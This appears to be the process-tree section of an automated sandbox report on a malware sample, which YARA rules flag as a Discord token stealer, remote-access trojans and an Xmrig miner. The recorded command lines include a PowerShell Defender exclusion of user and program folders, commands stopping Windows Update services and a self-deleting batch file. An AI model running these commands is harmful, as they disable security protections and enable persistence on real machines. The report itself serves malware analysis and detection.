                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:3
                                                                                                                                        Start time:15:21:56
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:15:21:56
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym
                                                                                                                                        Imagebase:0xe0000
                                                                                                                                        File size:7'619'102 bytes
                                                                                                                                        MD5 hash:232B5DBB1510598F8A683DD2752A99C4
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:15:21:57
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\ProgramData\main.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\ProgramData\main.exe"
                                                                                                                                        Imagebase:0x244176d0000
                                                                                                                                        File size:5'872'343 bytes
                                                                                                                                        MD5 hash:DE8515E07D1C34FFF3C1DDD4FEE593FB
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 66%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:6
                                                                                                                                        Start time:15:21:58
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\ProgramData\setup.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\ProgramData\setup.exe"
                                                                                                                                        Imagebase:0x7ff617a60000
                                                                                                                                        File size:5'617'152 bytes
                                                                                                                                        MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:7
                                                                                                                                        Start time:15:21:58
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                        File size:452'608 bytes
                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:8
                                                                                                                                        Start time:15:21:58
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                        Imagebase:0x7ff664270000
                                                                                                                                        File size:289'792 bytes
                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop UsoSvc
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:13
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop WaaSMedicSvc
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:14
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop wuauserv
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:15
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop bits
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:16
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop dosvc
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:17
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\dialer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\dialer.exe
                                                                                                                                        Imagebase:0x7ff7fb370000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:22
                                                                                                                                        Start time:15:22:02
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:winlogon.exe
                                                                                                                                        Imagebase:0x7ff7cd660000
                                                                                                                                        File size:906'240 bytes
                                                                                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:25
                                                                                                                                        Start time:15:22:03
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                        Imagebase:0x7ff692c20000
                                                                                                                                        File size:5'617'152 bytes
                                                                                                                                        MD5 hash:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:26
                                                                                                                                        Start time:15:22:03
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\lsass.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                        Imagebase:0x7ff7a2ae0000
                                                                                                                                        File size:59'456 bytes
                                                                                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:27
                                                                                                                                        Start time:15:22:03
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                        File size:452'608 bytes
                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:28
                                                                                                                                        Start time:15:22:03
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:29
                                                                                                                                        Start time:15:22:04
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:30
                                                                                                                                        Start time:15:22:04
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\dwm.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:dwm.exe
                                                                                                                                        Imagebase:0x7ff74e710000
                                                                                                                                        File size:94'720 bytes
                                                                                                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:31
                                                                                                                                        Start time:15:22:05
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat
                                                                                                                                        Imagebase:0x7ff664270000
                                                                                                                                        File size:289'792 bytes
                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:32
                                                                                                                                        Start time:15:22:05
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:33
                                                                                                                                        Start time:15:22:05
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:Tasklist /fi "PID eq 7748"
                                                                                                                                        Imagebase:0x7ff72d3d0000
                                                                                                                                        File size:106'496 bytes
                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:34
                                                                                                                                        Start time:15:22:05
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:find ":"
                                                                                                                                        Imagebase:0x7ff6d5c20000
                                                                                                                                        File size:17'920 bytes
                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:35
                                                                                                                                        Start time:15:22:06
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:Timeout /T 1 /Nobreak
                                                                                                                                        Imagebase:0x7ff63ae30000
                                                                                                                                        File size:32'768 bytes
                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:36
                                                                                                                                        Start time:15:22:06
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                        Imagebase:0x7ff664270000
                                                                                                                                        File size:289'792 bytes
                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:37
                                                                                                                                        Start time:15:22:06
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:38
                                                                                                                                        Start time:15:22:06
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop UsoSvc
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:39
                                                                                                                                        Start time:15:22:06
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop WaaSMedicSvc
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:40
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop wuauserv
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:41
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop bits
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:42
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:Tasklist /fi "PID eq 7748"
                                                                                                                                        Imagebase:0x7ff72d3d0000
                                                                                                                                        File size:106'496 bytes
                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:43
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:find ":"
                                                                                                                                        Imagebase:0x7ff6d5c20000
                                                                                                                                        File size:17'920 bytes
                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:44
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:sc stop dosvc
                                                                                                                                        Imagebase:0x7ff77ef20000
                                                                                                                                        File size:72'192 bytes
                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:45
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\dialer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\dialer.exe
                                                                                                                                        Imagebase:0x7ff7fb370000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:46
                                                                                                                                        Start time:15:22:07
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:Timeout /T 1 /Nobreak
                                                                                                                                        Imagebase:0x7ff63ae30000
                                                                                                                                        File size:32'768 bytes
                                                                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:49
                                                                                                                                        Start time:15:22:08
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\dialer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\dialer.exe
                                                                                                                                        Imagebase:0x7ff7fb370000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:50
                                                                                                                                        Start time:15:22:08
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:Tasklist /fi "PID eq 7748"
                                                                                                                                        Imagebase:0x7ff72d3d0000
                                                                                                                                        File size:106'496 bytes
                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:51
                                                                                                                                        Start time:15:22:08
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                        Imagebase:0x7ff6eef20000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:52
                                                                                                                                        Start time:15:22:08
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\find.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:find ":"
                                                                                                                                        Imagebase:0x7ff6d5c20000
                                                                                                                                        File size:17'920 bytes
                                                                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:53
                                                                                                                                        Start time:15:22:08
                                                                                                                                        Start date:01/03/2024
                                                                                                                                        Path:C:\Windows\System32\dialer.exe
